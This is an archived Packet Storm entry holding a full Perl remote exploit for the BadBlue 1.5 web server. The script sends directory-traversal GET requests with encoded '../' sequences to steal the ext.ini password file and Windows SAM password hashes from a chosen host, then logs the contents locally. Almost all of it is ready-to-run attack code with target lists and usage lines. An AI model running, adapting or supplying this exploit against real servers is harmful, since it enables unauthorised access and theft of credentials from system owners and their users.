badexploit.txt

2002-07-06T00:00:00
ID PACKETSTORM:26347
Type packetstorm
Reporter Iceburg
Modified 2002-07-06T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# - [ElectronicSouls] Private Do Not Distrobute -  
#  
# Remote Exploit For BadBlue 1.5 Web Server  
# www.badblue.com  
#  
# A transversal bug has been discovered in  
# BadBlue HTTP Daemon SoftWare. This is a  
# gay bug, yes I know. But it can be kinda  
# funny for those days you are bored =)  
#  
# Vulnerable System: Windows 95  
# Windows 98  
# Windows ME  
# Windows NT 3.5  
# Windows NT 4.0  
# Windows 2000  
# Windows XP  
#  
# syntax:   
#  
# -h --- Specify Host Name  
# -p --- Specify Host Port  
# -o --- For Grabbing Anothern file  
# -l --- For Logging.  
# -O --- Specify What OS  
# 9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)  
# NT --- For Windows NT 3/4 (Gets sam file and ext.ini)  
# 2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)  
# XP --- For Windows XP ALL  
#  
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O 9x - For Win/9x  
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -O NT - For Win/NT  
# perl badxploit.pl -h www.host.com -p 80 -l esh0yday.log -o 2X - For Win/2K/XP  
#  
# *************************************************************************  
# ** For the '-o' syntax you need to know the exact location of the file **  
# ** NOTE! You can only get files from the same drive as BadBlue **  
# ** **  
# ** Eg if($badblue-drive == $c:) {syntax will be get a file C:\boot.ini **  
# ** perl badxploit.pl -h www.host.com -p 80 -l es.log -o boot.ini } **  
# ** Now check es.log for the contents of boot.ini =) **  
# *************************************************************************  
#  
# You'll figure it out, If you don't understand.  
#   
# Greets: Websk8ter, BrainStorm, asmodian, _0x90_, divine, FreQ, northern, CraiK  
# kokshin, rocky, omnis, NtWaK0, loophole, icesk, tsilik, crazyl0rd, [t]hief  
# CraigTM, DeadMouse, irrupt, izik, sagi, ofer, natrix, samko, blah everyone else  
# [!ElectronicSouls], HHP   
#  
# Special THNX AND GREET TO *** Pneuma *** for being there for me =) Luv ya!@  
#  
# Bug discovered and written by Iceburg of [!ElectronicSouls].  
  
  
use Socket;  
use Getopt::Std;  
  
getopts("O:o:h:p:l:", \%args);  
  
print ("\n");  
print ("==================================================\n");  
print ("== -- Remote Exploit For BadBlue 1.5 WebServers ==\n");  
print ("== -- Discovered and Written By Iceburg ==\n");  
print ("== -- [ElectronicSouls] Production. ==\n");  
print ("==================================================\n");  
print ("\n");  
  
if (!defined $args{h}) {  
print qq~  
  
syntax:  
  
-h --- Specify Host Name  
-p --- Specify Host Port  
-o --- For Grabbing Anothern file  
-l --- For Logging.  
-O --- Specify What OS  
--9x --- For Windows 95/98/mE (Gets the ext.ini with passwords)  
--NT --- For Windows NT 3/4 (Gets sam file and ext.ini)  
--2K --- For Windows 2K SP-012 (Gets sam file and ext.ini)  
--XP --- For Windows XP ALL  
  
Syntax are case sensitive =)  
  
~; exit; }  
  
if (defined $args{h}) { $host=$args{h}; print "*** Exploiting $host ...\n"; }  
if (defined $args{p}) { $port = $args{p} } else { $port = "80"; }  
  
if (defined $args{l}) {  
$file=$args{l};  
$log=1;  
open (LOG,">$file") || die ("*** Cannot open file for logging\n");  
print LOG ("*** [ElectronicSouls] Production\n");  
print LOG ("*** BadBlue 1.5 Remote Exploit\n");  
print LOG ("*** Discovered And Written By Iceburg\n\n"); }  
  
# This is like eleet unicode.  
# I know more but I am too lazy to type it out.  
# If these don't work try adding some more ..%2F||252f||255c..  
# These are for default directories, if the directory ain't default  
# it won't work, therefor you can use '-o' syntax.  
  
# Win9x/mE Strings && WinNT/2K/XP  
  
@sploits1 = (  
"[ElectronicSouls]/..%2f../ext.ini", # Main String  
"[0WNZ]/..%252f..%252f../ext.ini", # Alternative  
"[YOU]/..%255c..%255c../ext.ini", ); # Alternative  
  
# WinNT Strings  
  
@sploits2 = (  
"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._",  
"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._",  
"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._",);  
  
# Win2K Strings   
  
@sploits3 = (  
"..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam",  
"..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam",  
"..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam",);  
  
# WinXP String   
  
@sploits4 = (  
"..%2F..%2F..%2F..%2F..%2F../windows/repair/sam",  
"..%252f..%252f..%252f..%252f..%252f../windows/repair/sam",  
"..%255c..%255c..%255c..%255c..%255c../windows/repair/sam",);  
  
  
if (defined $args{o}) {   
$string = $args{o};  
print ("*** Using Manual String $string\n");  
&connect;  
send(SOCK,"GET /$string HTTP/1.0\r\n\r\n",0);  
  
@ocheck=<SOCK>;  
($http,$code,$blah) = split(/ /,$ocheck[0]);  
if($code == 200) {  
  
print ("=========================\n");  
print ("*** Server is vulnerable \n");  
print ("=========================\n");  
print ("\n @ocheck\n");  
print ("=========================\n");  
  
if ($log) { print LOG ("==========================\n"); }  
if ($log) { print LOG ("*** Server is vulnerable \n"); }  
if ($log) { print LOG ("==========================\n"); }  
if ($log) { print LOG ("@ocheck\n"); }  
if ($log) { print LOG ("==========================\n"); }  
  
die ("*** J00 15 kr4d+LUC|<Y+hax0r n0w\n\n"); } else { print ("*** SORRY J00 kr4|) H4x0r 7r1x0r d1|) n07 w3r|<\n\n"); }  
}  
  
if (defined $args{O}) {  
if ($args{O} =~ "XP") { print ("*** Probing WinXP - ALL\n\n"); test4(); }  
if ($args{O} =~ "2K") { print ("*** Probing Win2K - SP1-2\n\n"); test3(); }   
if ($args{O} =~ "NT") { print ("*** Probing WinNT - 3/4\n\n"); test2(); }  
if ($args{O} =~ "9x") { print ("*** Probing Win9x - ME\n\n"); test1(); }  
}  
  
sub test4 {  
  
foreach $xploit4 (@sploits4) {  
&connect;  
send(SOCK,"GET /$xploit4 HTTP/1.0\r\n\r\n",0);  
  
@check4=<SOCK>;  
($http,$code,$blah) = split(/ /,$check4[0]);  
if($code == 200) {  
  
print ("=========================\n");  
print ("*** Server is vulnerable \n");  
print ("*** Getting sam file \n");  
print ("=========================\n");  
print ("\n");  
  
open(SAM,">sam") || error();  
  
my $x;  
  
for ($x=8;$x<=30;$x++) {  
print SAM ("$check4[$x]"); }  
test1();  
} else { print ("*** Server is not vulberable to string $xploit4\n"); }  
close(SOCK); }  
}  
  
sub test3 {  
  
foreach $xploit3 (@sploits3) {  
&connect;  
send(SOCK,"GET /$xploit3 HTTP/1.0\r\n\r\n",0);  
  
@check3=<SOCK>;  
($http,$code,$blah) = split(/ /,$check3[0]);  
if($code == 200) {  
  
print ("=========================\n");  
print ("*** Server is vulnerable \n");  
print ("*** Getting sam file \n");  
print ("=========================\n");  
print ("\n");  
  
open(SAM,">sam") || error();  
  
my $x;  
  
for ($x=8;$x<=30;$x++) {  
print SAM ("$check3[$x]"); }  
test1();  
} else { print ("*** Server is not vulberable to string $xploit3\n"); }  
close(SOCK); }  
}  
  
  
sub test2 {  
  
foreach $xploit2 (@sploits2) {  
&connect;  
send(SOCK,"GET /$xploit2 HTTP/1.0\r\n\r\n",0);  
  
@check2=<SOCK>;  
($http,$code,$blah) = split(/ /,$check2[0]);  
if($code == 200) {  
  
print ("=========================\n");  
print ("*** Server is vulnerable \n");  
print ("*** Getting sam file \n");  
print ("=========================\n");  
print ("\n");  
  
open(SAM,">sam") || error();  
  
my $x;  
  
for ($x=8;$x<=30;$x++) {  
print SAM ("$check2[$x]\n");   
}  
test1();  
} else { print ("*** Server is not vulberable to string $xploit2\n"); }  
close(SOCK); }  
}  
  
  
sub test1 {  
  
foreach $xploit1 (@sploits1) {  
&connect;  
send(SOCK,"GET /$xploit1 HTTP/1.0\r\n\r\n",0);  
  
@check=<SOCK>;  
#print "@check";  
($http,$code,$blah) = split(/ /,$check[0]);  
if($code == 200) {  
  
print ("===============================\n");  
print ("*** Getting contents of ext.ini\n");  
print ("*** Server is vulnerable \n");  
print ("===============================\n");  
print ("\n @check\n");  
print ("===============================\n");  
  
if ($log) { print LOG ("==========================\n"); }  
if ($log) { print LOG ("*** Server is vulnerable \n"); }  
if ($log) { print LOG ("*** Contents of ext.ini \n"); }  
if ($log) { print LOG ("==========================\n"); }  
for ($i=8;$i<=@check;$i++) { if ($log) { print LOG ("$check[$i]"); } }  
if ($log) { print LOG ("==========================\n"); }  
  
die ("*** J00 15 kr4d-hax0r n0w\n");   
  
} else { print ("*** Server is not vulberable to string $xploit1\n"); }  
close(SOCK); }  
}  
  
sub connect {  
my($iaddr,$paddr,$proto);  
$iaddr = inet_aton($host) || die "Error: $!";  
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";  
$proto = getprotobyname('tcp') || die "Error: $!";  
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");  
connect(SOCK, $paddr) || die("Unable to connect: $!");  
}  
  
sub error {  
print ("For some weird reason a error has occured: $!\n");  
print ("Continueing ...\n");  
}  
`